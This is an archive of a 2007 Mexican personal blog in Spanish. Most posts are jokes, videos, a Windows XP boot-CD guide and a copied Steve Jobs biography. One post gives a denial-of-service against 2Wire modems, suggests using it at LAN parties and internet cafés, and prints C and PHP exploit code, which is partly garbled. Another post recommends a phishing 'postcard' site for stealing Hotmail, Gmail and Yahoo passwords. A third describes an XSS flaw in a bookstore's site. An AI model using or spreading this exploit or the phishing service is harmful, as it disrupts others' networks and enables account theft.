sábado, 31 de marzo de 2007

Jesús el musical

Para esta cuaresma aquí les dejo un vídeo que se llevo mis aplausos, Jesús el Musical, para mantener nuestras tradiciones Cuaresmales XD.

jueves, 29 de marzo de 2007

Vulnerabilidad en el Sotano

Jugando por hay me encontré una vulnerabilidad en el sitio web de La librería el Sotano (www.elsotano.com), y es un XSS.

Ya reporte La vulnerabilidad y espero que no hagan caso omiso, ya que se me ocurren varias cosas o formas en las que alguna persona, con no muy buenas intenciones podría sacarle provecho.

Bueno la vulnerabilidad esta en el buscador y la explicaría pero en realidad no tiene mucha ciencia, pero bueno básicamente lo que me di cuenta es que los primeros 45 caracteres son de relleno aunque cumplen un papel importante, ya que son los que verifican y si sobrepasas esa cantidad puedes insertar código para que se muestre en el sitio.

Si quieren ver la vulnerabilidad en acción hagan click aquí.

Y verán algo como lo sig.

También encontré otra cosa un pongo graciosa(aunque muy lógica) si quieren ver el contenido de toda la base de la tienda solo busquen “%%” y les van a salir chorocientasmil paginas de resultados, XD.

Powered By Vilchis.

miércoles, 28 de marzo de 2007

Imágenes escondidas en Google Earth

Google Jobs

Yo quiero trabajar para Google.

martes, 27 de marzo de 2007

Peda en casa de Reiy

Los que perdieron y las dieron:

El más Malacopa

La chela cuajada

Y a continuación los que se llevaron la Noche

3er Lugar - El Merol con su tirada de cortina.

2do Lugar - Los más Malacopa con No voy por ti al metro.

Y en 1er isimo lugar el Don con el baile de la puerta(No me pregunten por q').

Que además nos deleita con un vídeo extra de Lucha en Lodo.

domingo, 25 de marzo de 2007

Los Simpson, Opening

Q buena entrada de los Simpson.

Dibujando con los dedos

sábado, 24 de marzo de 2007

Buey pendejo

que cagado.

lunes, 19 de marzo de 2007

Web cam, Girl

Jejeje, esta cagado.

Pisarron magico, jejeje

No mams, estos weyes de el MIT están bien locos, chequense este pisaron, esta super chido, definitivamente me dejo sin palabras.

Como hablar ingles sexy

Así deberían de ser los cursos de Ingles, jejeje.

Jejeje, no ma q' mal plan

No ma, tienen que ver este vídeo, me avían contado que avía pasado, pero no pensé que fuera real.

Es como de película, mientras los paramedicos atienden a un se cae otro y casi lo atropellan, jejeje, no c lo deseo a nadie.

domingo, 18 de marzo de 2007

Tirando un Dos a router 2wire

Hace tiempo me ya varios meses salio una vulnerabilidad en la cual le puedes hacer un ataque DOS a los módem 2Wire que son los que da telmex(Prodigy) o por lo general los que da.

La vulnerabilidad fue descubierta por el Mexhackteam ya hace varios meses y consiste en enviar paquetes con los caracteres CRLF usados en entornos windows para generar un Retorno de Carro y un Salto de Linea mediante el método GET, el cual al no reconocer como manejarlos y cae en un DOS.

de echo sacaron un exploit y toda la cosa y hasta un wey lo paso a php pero la verdad es que a fin de cuentas el exploit ni se necesita.

Lo único que tenemos que hacer es poner la sig. url en nuestro explorador:


y vamos a notar como nos quedamos sin Internet o se cae la red, esto lo que hace es que reinicia nuestro módem o router, esto en donde lo podemos usar pues en la Lan Party jejeje, o en un café Internet, o en cualquier lugar en donde tengan un módem 2wire, que por lo general si tienen prodigy lo tienen. la verdad no recuerdo q modelos son los que presentan la vulnerabilidad, pero bueno que le vamos a hacer.

haci que no hagan mal uso de esta vulnerabilidad.

si a alguien le interesa el código de los exploits aquí los dejo de todas formas:

//2Wire OfficePortal 0
//2Wire HomePortal 1500W
//2Wire HomePortal 100W
//2Wire HomePortal 100S
//2Wire HomePortal 1000W
//2Wire HomePortal 1000SW
//2Wire HomePortal 1000S
//2Wire HomePortal 1000
//2Wire HomePortal 0
////////////////////////////////// [ STARTING CODE ]
//// [ Explanation ] this PoC make an evil_request
//// and send to the server , when the server process
//// it the request fall him, AND THE MODEM WILL RESET!.
//// [ Note ] This Poc was coded using Dev-C++
//// If you have any error with the librarys you need
//// include libws2_32.a at the project.
//// Enjoy it n_nU!..
//// Coded by preth00nker (using Mexican skill!)

#pragma comment(lib,"libws2_32.a")
#include "winsock2.h"

unsigned long dir;
char h[]="";
short port;
char badreq[]="";
int state;

int main(int argc, char *argv[])
printf("#### PoC of DoS 2wire_Gateway\n");
printf("#### By Preth00nker\n");
printf("#### http://www.mexhackteam.org\n");
if (argc<4){
printf("[Usage] %s $Host $Port $Variable\n",argv[0]);
printf("\n[I.E.] %s 80 PAGE\n",argv[0]);
return 0;
//Crear socket
WSADATA wsaData;
SOCKET wsck;
struct sockaddr_in Wins;
struct hostent *target;
Wins.sin_addr.s_addr=inet_addr(inet_ntoa(*(struct in_addr *)target->h_addr));
//llamamos al socket
wsck=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,(int unsigned)NULL,(int unsigned)NULL,(int unsigned)NULL);
//Verifica por error
if (wsck==SOCKET_ERROR){printf("Error al crear el socket =!..");WSACleanup();return 0;}
printf("Socket creado correctamente!.. hWndl: %d",wsck);
return 0;
printf("\nError al conectar =!..");
//Make a bad query and send it ..Mwajuajua!..
strcat(badreq,"GET /xslt?");
strcat(badreq,"=%0D%0A HTTP/1.0\r\n");
strcat(badreq,"Accept-Language: es-mx\r\n");
strcat(badreq,"User-Agent: MexHackTeam\r\n");
strcat(badreq,"Host: ");
strcat(badreq, "\r\n\r\n\r\n");
send(wsck , badreq ,(int)strlen(badreq), 0);
printf("\nDatos Mandados!..");
printf("\nThat's all, Check this out!...\n");
return 0;
//////////////////////////////////////////// [ EOF ]

Y el codigo en php es el sig:


dos 2wire

Exploit Original por preth00nker

Codeado en php por RootBox.



$_REQUEST['router'])) { $router = $_REQUEST['router']; }else{ die("Te falta especificar la direccion IP del router"); }
$_REQUEST['port'])){ $puerto = $_REQUEST['port']; }else{ die("Te falta especificar el puerto"); }

$socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);

if (!
$socket) {
"socket_create() fallo: razon: " . socket_strerror($socket) . "
; exit(0);

$result = @socket_connect($socket, $router, $puerto);

if (!
$result) {
"socket_connect() fallo. razon: (".$result.") " . socket_strerror($result) . "

; exit(0);

"Conexion establecida
"Enviando Paquete....

$requestheader = "GET /xslt?PAGE=%0D&0A HTTP/1.0\r\n";
$requestheader .= "Accep-Language: es-mx\r\n";
$requestheader .= "User-Agent: PoCPHP\r\n";
$requestheader .= "Host: ".$router."\r\n\r\n\r\n\r\n";

socket_write($socket, $requestheader, strlen($requestheader));

"Datos enviados!!!, Talvez ya esta off.. prubea";

Writed by Edgar Vilch...

Cabezeras de los correos

Como ver las cabeceras de los correos que recibimos en hotmail, esta info la pongo especialmente para Momny por si acaso no recordó como era.

Bueno que tipo de información podemos obtener en la cabeceras pues principalmente la ip de la persona que nos envio el correo y esto de que nos sirve pues de mucho ya que por ejemplo si la persona sigue conectada puedes saber la ip que tiene actualmente, si recibes algún tipo de amenaza puedes por medio de la IP y la fecha pedir a el ISP de esa ip información sobre el usuario que se conecto en ese momento, para realizar una investigación por ejemplo si secuestran a alguien y te contactan por correo electrónico este tipo de cosas pueden ser de gran utilidad. O si no simplemente puedes obtener mas información sobre esa IP haciéndole un Whois.

bueno ya explique mas o menos para que se puede utilizar, hora voy a explicar que es lo que se tiene que hacer para que nuestro correo de hotmail, nos muestre las cabeceras de el correo lo que tenemos que hacer es:

  1. Entramos en "Opciones"
  2. entramos a las opciones de "Correo"
  3. Entramos a "Configuración de pantalla de correo"
  4. Buscamos donde dice "Encabezados de mensaje", seleccionamos "Avanzado" y Aceptamos los cambios.
Y ya ahora cuando revisemos nuestros correos vamos a poder observar las cabeceras de el mensaje y por ejemplo la que nos da la ip de el origen de el mensaje va a estar en:

X-Originating-IP: xxx.xxx.xxx.xxx

Y podemos obtener aun mas info de las cabeceras como la hora en que fue enviado, la ip de el servidor de correo, etc.

Writed by Vilch...

Hotmail, Gmail & Yahoo Passwords

Ya tenia rato que no veía que saliera una pagina de fake que funcionara bien, ya la probé y los correos no llegan a el spam y si guarda los passwords y demás, yo estaba haciendo una hace tiempo pero la deje inconclusa por el echo de que los correos nunca llegaban correctamente pero bueno, ya salio una que funciona bien.

Para los que no sepan de que estoy hablando pues, es una pagina en la que tu pones un correo de alguien y le envía una postal por ejemplo de gusanito(la clásica, jejeje) o de algún otro sitio pero para poder verla le hace creer que se tiene que logear con su cuenta de correo nuevamente y esta se guarda en una base de datos y le muestra la dichosa postal, jejeje.

Después tu llegas y lo que haces es entrar nuevamente a la web de fake y teclear el correo de la persona y te muestra el password que introdujo y ya esa es la principal forma en que se "Hackean"(si a eso le llaman hackear) las cuentas de hotmail, yahoo y gmail, no tiene mucha ciencia o si?

Entonces aquí les dejo la liga, para toda esa gente que a cada rato me esta pidiendo que le consiga passwords de hotmail y blablabla, pues aquí esta para que me dejen de molestar, jejeje por q la verdad que hueva hacerlo yo y si ustedes lo pueden hacer pues que mejor.

Lo único malo de este tipo de sitios es que cualquiera puede ver los passwords de la base, claro si sabe el correo y por su puesto los creadores de el sitio se llevan la mejor parte una mega lista de passwords de cuentas.

La Pagina es:

Espero que les sirva.

sábado, 17 de marzo de 2007

jejeje, Miren a quien me encontre

al buen Dodo


jejeje que puedo decir, lo tienen que ver.


El siguiente, es el levantamiento de datos realizado
por un estudiante en Práctica de Ingeniería:

Un semáforo cambia de estado, en promedio, cada 30
segundos (treinta segundos en rojo, treinta segundos
en verde). Por lo tanto, por cada minuto, un limosnero
tiene 30 segundos de tiempo útil para lograr recibir
un mínimo de $2.00.
Con este esquema, en 1 hora de trabajo el limosnero
habrá recaudado: (60 minutos x $2.00 / minuto)=

Si el limosnero trabaja 8 horas por día, descansando
los domingos, da un promedio de 25 días por mes, lo
que deja un ingreso de:
(25 días / mes x 8 horas / día x $120.00 / hora) =
$24,000 al mes ¿Será que ésta es una cuenta
Ahora bien $2.00 o $3.00 y a los mas generosos los he
visto dar hasta $5.00. Sin embargo, vamos a ser
conservadores y asumir que en realidad el limosnero
sólo recauda la mitad de la cuenta inicial, o sea:
$60.00 hora. Haciendo nuevamente las cuentas tendremos
un valor final de $12,000.00 / mes.

Esto, equivale al salario promedio bruto de un
supervisor de Ingeniería, que se desempeña en una
empresa de mediano porte; trabajando
48 horas nominales por semana, y aún teniendo que ir
los domingos a resolver los problemas de mantenimiento
y otros. De esta forma, cuando el limosnero recibe
$5.00 (que no es raro), puede descansar tranquilo
debajo de un árbol por lo próximos 9 cambios de luz
del semáforo, y sin ningún jefe que lo joda por causa
de este descanso en medio de la jornada de trabajo.

Pero hasta aquí todo es teoría... ahora vamos al mundo
Con estos datos en mano, fui a entrevistar a una mujer
que pide limosnas y que siempre va a cambiar las
monedas en una tienda de
barrio (a los bodegueros les encanta el sencillo) .

Le pregunté cuánto recibía de limosna por día, ¿Saben
lo que me respondió?

Pues la cuenta inicial estuvo bastante aproximada:
¡¡¡Un promedio de $400.00 a $450.00 diarios!!! Con
esto nos queda un ingreso mensual de:(25 días / mes x
$400..00 / día)= $10,000 / mes o de: (25 días / mes x
$450.00 / día) = 11,225.00 / mes, lo que en promedio:
da ¡¡¡$10.625.00 / mes!!!

Y pero aún: ella me dijo que jamás llega a trabajar ni
si quiera 8 horas diarias...ni tampoco los 6 días a la

MORALEJA: Es mejor ser limosnero que trabajar como
Ingeniero... pedir limosna es mas lucrativo. Ahhhh...
¡y no pagan impuestos, ni ISPT, IMSS, ni rentas de 1ª,
2ª, 3ª, 4ª, 5ª, 6ª, 7ª, 8ª, 9ª,.....categorías!.... ni
han tenido que estudiar / practicar 'X' años.
Entonces, ¿Tienes $1.00 que me regales?

PD. Ojo: Y los demás tampoco se salvan. También válido
para abogados, arquitectos, economistas, médicos, N/N,
etc., etc., etc.., para tomar en cuenta la próxima que
te pidan limosna o NO???????????????


Crear un LiveCd de WinXP - SP2

Hace tiempo que leei como hacer un disco booteable de windows xp pero la verdad ya no me acordaba aci que me puse a buscar nuevamente y aquí esta un pequeño texto que encontré, espero que les sirva.

1) El CD Original de XP - puede ser el Normal, o bien uno con SP1 (integrado por nosotros previamente o el propio de Microsoft)
2) La versión final de SP2 (en español en el sitio de Microsoft)
3) El fichero de boot que podéis bajaros de aquí.
4) Un software de grabación. En particular, este artículo describe paso a paso como hacerlo con el Nero versión

Pasos a seguir:

1) Creamos en un disco duro (por ejemplo C:\) una carpeta llamada XP.

2) Creamos dentro de esa carpeta, otras 3. Una llamada BOOT, otra llamada CD y otra llamada XP-SP2. Es decir, tendremos:


3) Copiamos el contenido entero del CD original de Windows XP a la carpeta C:\XP\CD

4) Copiamos el Service Pack2 (WindowsXP-KB835935-SP2-ESN.EXE en español, o bien, WindowsXP-KB835935-SP2-ENU.exe en inglés) a la carpeta C:\XP

5) Abrimos una ventana de comandos (cmd.exe). Vamos a funcionar desde ahora con comandos desde dicha carpeta.

6) Extraemos el contenido del paquete SP2 desde la ventana de comandos y ejecutando:


7) Vamos a aplicar ahora el service pack a la distribución original de Windows XP. Para ello, en la misma ventana de comandos ejecutamos:


Al finalizar debemos recibir un mensaje que diga: "Integrated install has completed succesfully" (o bien su traducción al castellano). Si no recibiésemos ese mensaje, algo hemos hecho mal. Revisad los puntos anteriores entonces.

NOTA: Los pasos 6 y 7 pueden hacerse de una sola tacada:

C:\XP\XPSP2 /integrate:C:\XP\CD\

8) Del fichero boot.zip que te has bajado antes (al principio de estas instrucciones), extraemos el fichero boot.bin que contiene y lo dejamos en la carpeta C:\XP\BOOT

9) Arrancamos Nero (tengo la versión en inglés, por tanto voy a describir los pasos que se darían en dicha versión)...

10) Seleccionamos en la columna de la izquierda"CD_ROM (Boot)" y pinchamos la pestaña "Boot" superior. Dejamos marcado en dicha pantalla lo siguiente:

* Desmarcada la opción"Bootable Logical Drive".
* Marcada la opción "Image File". Damos al botón de "Browse", y apuntamos al archivo C:\XP\BOOT\BOOT.BIN
* Marcada la opción: "Enable expert Settings (for advanced users only)"

Dentro del recuadro inferior ponemos:

* En "Kind of emulation": No Emulation
* En "Boot message": Nero Boot-Loader V3.0
* En "Load segment of sectors(hex!)" 07C0 (es decir: cero-siete-letra C, y cero)
* En "Number of loaded sectors: 4 <---- IMPORTANTE

11) Pulsamos la pestaña superior: ISO y únicamente deben estar marcadas (desmarcar el resto):

* File Name Lenght: Max of 31 chars (ISO Level 2)
* Format: "Mode 1"
* Character Set: "ISO 9660 (standar ISO CD-ROM)"
* Marcar casillero de "Joliet"
* Marcar: "Allow pathdepth of more than 8 characters"
* Marcar: "Allow more than 255 characters in path"
* Marcar: "Do not add the ';1'ISO file version extension"

12) Pulsamos la pestaña superior; LABEL y seleccionamos:

* ISO9960: Ponemos como titulo la etiqueta que tengamos en nuestro actual CD de XP. En particular, yo que tengo la versión en inglés, tengo: WB2PFRE_EN

13) Pulsamos la pestaña: DATE

* Únicamente debe estar marcado: "Use the date and time from the original file"

14) Pulsamos la pestaña: "BURN" (marcar únicamente y desmarcar el resto)

* Marcar: "Write"
* Marcar: "Finalice CD (no further writing possible!)
* Seleccionar la velocidad de grabación (será la máxima de nuestro CD)
* Seleccionar en "Write Method": Track-At-Once
* Seleccionar el número de copias.

15) Pulsamos ahora el botón "New" para que nos saque la ventana de diálogo en donde podremos seleccionar TODOS los archivos y carpetas de C:\XP\CD que anteriormente habíamos preparado, y lo arrastramos a la ventana en donde aparece nuestra unidad grabadora. (copiar SÓLO el interior de C:\XP\CD)

16) Damos al botón de grabar "Write"


Navegando me encontre esta pantomima de videojuegos, la cual a mi me pareció muy buena, se las recomiendo.

The jackass

Desde hace mucho tiempo uno de mis sueños a sido gravar mis propios episodios tipo Jackas y se que algún Dia lo tengo que hacer pero mientras eso pasa aquí les dejo un vídeo muy gracioso, al estilo jackass(Parodia).

domingo, 11 de marzo de 2007

Poncho sin su mascara

Poncho en clase de Ing. de SW.

EL famoso video de Olaf

Yo quiero una USB como esa

viernes, 9 de marzo de 2007

Hackers en la ULSA

Hola a t0d0s, pues ya termino el congreso de seguridad de la Universidad La salle el cual estuvo relativamente bien en mi opinión tubo sus pros y sus contras, pero en general estuvo bien, hubo varias conferencias muy chidas como la que impartió el Nahual que en teoría debería havar sido la de hacking ético y que ya que estaba en el estrado nos dijo, saben que los engañe no voy a hablar de eso y nos empezó ha hablar de un nuevo tipo de virus muy locos a mi parecer y de los cuales el es el iniciador, nos enseño uno que el programo que va probando y buscando vulnerabilidades y a la vez el virus va aprendiendo y explota solo la vulnerabilidad. También hubo algunas otras muy buenas conferencias otra que me agrado mucho fue la que impartió Napa sobre ingeniería en reversa en la que hizo una demostración en la que tenia un programita que tu metías tu nombre y tu clave y te la validaba, al cual le hizo ingeniería en reversa y fue checando la forma en que se generaba el key con lo cual genero un generador de la llave o mejor conocido como crack, lo único malo es que no quiso enseñar el crack de win zip,, jejeje. La de Isaias Calderón que tenia mucho q ver con forense pero de una forma remota estuvo muy interesante ya que te planteaba algunos problemas que antes se tenían en la forensia cuando se apagaba la computadora y se perdía la info. q estaba en memoria y además el tiempo que tarda un forense en llegar a el punto donde se encuentran los servidores para hacer el análisis lo que se podía empezar remotamente y haci ganar tiempo. El Fraude en Linea de Carlos Lang también valió mucho la pena ya que nos enseño un nuevo programa que va a cambiar la banca en linea en México y en el mundo, y algunas otras conferencias mas, espero que el próximo año allá otro congreso y que este mucho mejor que este. Para los que quieran ver las presentaciones y demás las pueden encontrar en el sitio oficial de el congreso http://seguridad.lci.ulsa.mx/congreso07 y además los invito a que se den una vuelta por la pagina de seguridad de el laboratorio de computo de ingeniería les aseguro que se pueden encontrar cosas muy interesantes http://seguridad.lci.ulsa.mx.

lunes, 5 de marzo de 2007

Steve Jobs

Biografia de Steve Jobs

Que puedo decir Steve Jobs es una de las personas que mas admiro junto claro con Stive Wozniak y por eso me parece buena idea poner la biografía de Stive Jobs que fue la que encontré de una forma mas fácil por haci decirlo, y también por que recuerdo q el semestre pasado o bueno en tercer semestre en la Uni. haci me decian Stive Jobs, jejeje

Steve Jobs was born on February 24, 1955 in San Francisco. He was an orphan and was adopted by a local couple, Paul and Clara Jobs, who lived south of the Bay Area, in what would later be known as Silicon Valley.

Steve discovered the world of electronics at age 11 with his friend Bill Fernandez. A few years later, Bill would introduce him to one of his other friends who was 5 years older and had already distinguished himself as an electronics wiz kid, Steve Wozniak, nicknamed Woz.

During his late teens, Steve would become more friendly with Woz, as he would persuade him to sell his so-called blue boxes, small pieces of hardware that could be used to make international calls for free.

As he entered college, Steve realized higher education would not give him what he expected from life. So after six months, he dropped out and started to immerse himself in the studies of Eastern mysticism. It was not until his 19th birthday that he got his first job at video-game manufacturer Atari.

The people at Atari agreed to fund Steve’s spiritual journey to India. He left for a full month with his best friend Dan Kottke looking for enlightenment but came back pretty disappointed.

After his return from India, Steve renewed his interest in electronics as he discovered the amazing work his friend Woz had achieved to complete: the design of a very compact personal computer. He had done so thanks to his talents and the skills he had got from the Homebrew Computer Club, a local computer enthusiasts group. Once again, Steve seized the potential of selling the computer his friend had built to other hobbyists. It was the official birth of Apple Computer, on April 1, 1976.

Steve Wozniak and Steve Jobs in 1976 (behind an Apple I)

Apple’s first sales came from a local retail computer store, the Byte shop. The owner of the shop bought 50 Apples, each for $500. The first computers were assembled in the garage of Steve’s parents in Los Altos, with a few friends willing to give a hand.
After Apple made its first public appearance at the Personal Computer Festival in Atlantic City, Steve Jobs understood the importance of the company’s image. He turned to PR adviser Regis McKenna to promote the fledging company. With the help of McKenna, he also got his first investor ever in the person of Mike Markkula. Markkula was a former Intel executive who had become a millionaire, and who was stunned by Woz’s prototype for a new computer, the Apple II.

The Apple II was introduced a year later at the West Coast Computer Faire in April 1977. It was the debut of what would become one of the most successful story in American business. Woz’s new design was a real breakthrough thanks to its compactness and performances, and as soon as a disk drive became available for the Apple II, it became an instant success. thousands of programmers started to write software for it and it quickly turned into the symbol of the personal computing revolution. What was left of the competition vanished when VisiCalc, the first spreadsheet program ever, was released in late 1979 and ran only on Apple’s system.



Steve Jobs and Mike Markkula in 1977

Steve in his first suite (1977)

After the success of Apple II, Steve started working on the next great project for the Cupertino-based company: Lisa. This computer’s main features were the mouse and the Graphical User Interface (GUI) - the metaphor of the desktop with windows, folders, point-&-click and cut-&-paste. They had all been invented at Xerox PARC (Palo Alto Research Center), a very advanced research lab located on the Stanford campus. The heads of Xerox on the East Coast believed the personal computer that the scientists at the PARC had developed had no future. Steve was convinced of the opposite: he urged Apple’s own R&D department to dedicate all the company’s efforts to the creation of a GUI for Lisa.

However his tough managerial style and tensions with Apple’s President Mike Scott led to his exclusion from the Lisa project. Steve was named Chairman of the Board instead. He used this prominent position to promote Apple’s image in the national media before Apple went public on December 12, 1980. On that day, Steve’s value jumped from $7.5 million to $217.5 million. He became the youngest self-made centimillionaire in America and started to be known to the general public.



Steve with the Apple II in '79

On the cover of Time in Feb. '82

However this is not the way he had envisioned his life. He wanted to be involved in the development of Apple’s future products and to do so, he took over a small R&D project called Macintosh. The project, instigated by Apple employee #31 Jef Raskin, called for a $300 dollar computer “as easy to use as a toaster”. Steve liked the idea of simplicity but he insisted that Macintosh become a smaller and cheaper Lisa, along with all its breakthrough graphical features. Raskin was evicted from the program, which quickly evolved into Steve’s very own pet project.

The small group of people who formed the Mac team was a bunch of iconoclastic yet brilliant engineers with a spirit of rebellion that Steve encouraged to prevent the division from being contaminated by Apple’s bureaucracy. They saw themselves as “Pirates”, and called the rest of the company “the Navy”.

Steve and the Mac team, with their pirate flag hanging on the wall

When, in 1981, IBM released its own personal computer -the IBM PC-, Apple had to face competition from what was at the time the most trusted name in technology, especially among corporate America. Eventhough the PC was inferior to the Apple II in all respects, the logo it sported was sufficient to make Apple II sales start to erode.

The company then released the Apple III and the Lisa, both of which turned out to be failures. The Lisa, despite its revolutionary GUI, failed because it was way too costly for businesses, with an original price tag of $10,000. So all of the company’s hopes were turned to Steve and his renegade Mac team.

Macintosh was finally introduced in great fanfare on January 24, 1984. It brought maximum media exposure to Steve and the former Pepsi executive he had appointed as Apple’s new CEO the year before, John Sculley.



The first issue of Macworld

Steve Jobs with John Sculley in 1984

But despite this hype and the technological breakthroughs it featured, sales of Macintosh were disappointing. It was a little too slow, and almost no software useful to businesses could run on it. In fact, it only encountered success on US campuses, where it quickly became a cult icon. The disillusionment with Macintosh were the start of increasing tensions between Steve and CEO John Sculley, which final outcome was the removal of Steve from the Mac & Lisa divisions.

Steve had become an unappreciated pariah at Apple. He was moved to a remote office which he dubbed Siberia. So he decided to leave and found a new company. The success of Macintosh on campus and talks he had had with many Ivy League hotshots had convinced him to create a computer aimed exclusively at the higher education market. to do so, he took with him five people from the former Macintosh team and created NeXT Computer, Inc.

When John Sculley and the Apple board saw the list of NeXT’s founders, they decided to sue the little startup. This was a legal nightmare for tiny NeXT but it showed that it had a huge potential of development: how could a multi-billion dollar business be afraid of just 6 people?

This was the beginning of the myth of NeXT. The company was enormously attractive for young talents and Steve’s fame and chutzpah was a lure for the best people in Silicon Valley. Steve aimed at building a perfect company: he rented first-class offices on Stanford campus and spent $100,000 for a logo design from renowned Yale professor Paul Rand. Then, in 1986, NeXT got his first major investment from Texan billionaire Ross Perot, who valued the company at $100 million, while it had yet to release a single product! But such was the aura of Steve Jobs. Because of the very strict secrecy policy, everybody wondered what the wunderkind was up to.



Steve Jobs and Ross Perot in 1987

The Paul-Rand logo

They got an answer some two years earlier when, on October 12, 1988, the NeXT Cube was finally released. It was strikingly elegant and featured revolutionary features like a magneto-optical drive and a DSP (digital signal processor), yet it was way too expensive for the average education buyer. Universities had asked for a $3,000 computer, and the Cube cost $6,500! Such a high price was due to Steve’s drive for perfection, and his will to build his computer in an all-automated state-of-the-art factory a few miles from NeXT’s own headquarters.



Steve Jobs unveils the NeXT Cube
on October 12, 1988

The NeXT Cube on the cover of Byte magazine

The sales of NeXT Cubes were extremely low, and Steve decided to change the company’s strategy. He extended sales to non-educational market with a partnership with computer retailer Businessland and started work on a new machine, the NeXT Station. The NeXT Station was a huge improvement over the Cube as it was much more compact and especially a lot cheaper: it sold for $5,000 (with the monochrome display). It was released in September 1990.

However the hopes brought by the NeXT Station as well a new retail strategy via boutique dealers and the extension to European and Japanese markets quickly turned out to be illusional. NeXT kept on losing money, more than ever. In 1993, Steve was forced to abandon NeXT’s hardware operations to concentrate solely on the company’s true gem, the breakthrough object-oriented software that ran on its computers, NeXTSTEP. It was terrible news for him because he loved to design and manufacture beautiful boxes. In addition, 4 of the 5 NeXT cofounders had abandoned him, and he had been betrayed by a COO he had personally designated as his successor, just like he had been 8 years earlier by John Sculley at Apple. It was the nadir of his career. He started to fade out of public life and rarely showed up at NeXT, spending time with his newborn son and young wife Laurene Powell (whom he had married on March 18, 1991).



The NeXT Station

Laurene Powell-Jobs

However an investment he had made almost a decade earlier was soon to get him out of his morass. In 1986, he had bought the computer division of George Lucas’ Industrial Lights & Magic for $10 million, and had incorporated it as Pixar Animation Studios. Pixar was made of a small group of brilliant refugees from academia, lead by engineers Ed Catmull and Alvy Ray Smith and former Disney animator John Lasseter, who believed in the dream of computer animation. Its only product was the Pixar Image computer, a $135,000 graphic workstation that could run its cutting-edge animation software Renderman. Way too expensive, this computer didn’t sell well, but Pixar managed to get money from making TV commercials. However, what really prevented Steve from shutting down Pixar was its nomination at the Academy awards in 1986 for Best animated short film with Luxo Jr. (the little lamp eventually became Pixar’s logo) and its 1989 Oscar for Tin Toy.

In 1991, Steve signed in the name of Pixar a deal with Disney for creating a computer-animated feature film, that would later become Toy Story. He did not realize how important this movie would be for his career until 4 years later when, in January 1995, he saw all the preparation around the marketing of the movie. That’s when he decided what would turn out to be one of his best career move, to take Pixar public. He expected the media hype and Hollywood glamour to play a huge role in the IPO’s success, so he planned it for November 29, 1995, a couple of weeks after the Thanksgiving release of Toy Story. It worked even better than expected: after 30 minutes of trading, Steve Jobs’ $420 million worth of Pixar shares were valued at $1.5 billion. Steve was back in business.



Toy Story

Steve sitting under
Pixar's symbol, Luxo Jr.

It just so happens, Apple Computer was at its lowest point in history at the time. Although it had lived off the revenues from Macintosh sales, which remained the only GUI computer for years, it was now facing competition from an ever-bigger adversary: Microsoft. A little software company that had written programs for the Mac, Microsoft had become a billion-dollar corporation by selling the IBM-compatible operating system MS-DOS to PC cloners. “Inspired” by the Mac OS, it had then started to sell a GUI-facade to DOS, Windows. But in 1995, with the release of Windows 95, the first combination of DOS and Windows, it became the PC industry’s only standard. Apple’s marketshare was down to around 5%.

Apple’s CEO, Amelio, was desperately looking for a way to save the company. One of his projects was to release an object-oriented OS to compete with Windows NT. His original plan was to buy BeOS, a system manufactured by a little software company, Be, that had been created by former Apple France president Jean-Louis Gassée. But on December 20, 1996, he unveiled that Apple had eventually chosen to buy NeXT Software Inc. instead, and had welcomed back his founder to the company as “informal adviser”.

Gil Amelio and Steve Jobs on December 20, 1996

After two consecutive disastrous quarters for Amelio however, the informal adviser managed to overthrow Amelio and become Apple’s interim CEO. Steve purged the Board of Directors and started to take drastic measures. He canceled dozens of R&D projects and made spending cuts wherever he could. On August 6, 1997, at MacWorld Boston, he also unveiled an unprecedented partnership with industry mogul Bill Gates, who invested $150 million in Apple and promised to release all future versions of Office on the Mac platform. After this series of measures, Steve announced in early 1998 that Apple had, for the first time in years, achieved profitability.

The biggest coup Steve would achieve was yet to come: on May 6, 1998, he unveiled the iMac, a colorful and elegant all-in-one computer whose design boldness evoked that of the original Macintosh. The iMac was a stunning success, and Apple was once again regarded as the industry’s most innovative company. It even become a design cult object after it was declined in 5 colors seven months later.

Steve’s leadership of Apple had proven efficient and on January 5, 2000, he took over as Apple’s CEO.



Steve Jobs and the iMac
Taking over on January 5, 2000

In 2001, Apple made two major announcements that would play a major role in its upcoming history. On March 24, it released Mac OS X 10.0, the first version of its next-generation operating system. Mac OS X was built on the bases of NeXTSTEP and thus enjoys a very solid UNIX foundation. In addition, it features a revolutionary user interface called Aqua. Then, on October 23, 2001, Apple unveiled iPod.



Mac OS X 10.0 "Cheetah"

The development of Mac OS X using NeXT’s software technology allowed Apple to write new applications for its own platform, the so-called iApps. they were built to let people organize and share their digital iLife, according to Apple’s digital hub strategy. This concept was elaborated in 1998: it claimed that after the two great ages of personal computing: the productivity era in the 80s and the Internet era in the 90s, the 2000s would be the years of a third era - that of the digital lifestyle. People would use their new digital devices like digital cameras, camcorders and music players, and plug them in to a central hub, the digital hub, i.e. the computer. To help people take full advantage of these devices, Apple created iMovie (to edit movies), iDVD (to burn DVDs), iPhoto (to organize photos) and iTunes (to... wait a minute, you don’t know iTunes?)

Nevertheless, what Steve had not anticipated was the burst of digital music, with the Napster phenomenon. He thought the next big thing was going to be desktop video editing. When he realized he had been wrong, he launched an ad campaign “Rip. Mix. Burn” to promote its music software iTunes and started work on the iPod.

When the cigarette-box-sized white MP3 player was released, it was an instant success. It was so successful that Apple made it available for PCs in 2002. Then, in April 2003, Steve introduced the iTunes Music Store. This online music store, the first to be supported by all five major music labels, allowed you to buy thousands of songs in digital format at the standard price point of $0.99 (and albums for $9.99). Six months after its introduction, the iTunes store was so successful that it was considered the only legal alternative to online music piracy. So the labels agreed to let Apple make it available to the Windows world. Since then, iPod and iTunes have become the uncontested symbols of the digital music revolution and both enjoy a marketshare that’s above 75%.



Steve Jobs and the original iPod

Steve with the video iPod
some 4 years later

Apple is now the leader of legal music downloading and portable music players, and considered the computer industry’s main innovator thanks to its awe-inspiring personal computers and the world’s most advanced operating system, Mac OS X.

But what about Pixar? Well, when the end of the 5-picture deal it had with Disney started to get closer, Steve, strong of the tremendous success of his movies A Bug’s Life, Toy Story 2, Monsters Inc. and Finding Nemo, came to re-negotiate the contract. However the tensions between him and Disney’s CEO Michael Eisner put an end to the negotiations in 2004. Pixar, which was about to release The Incredibles, went officially looking for another partner.

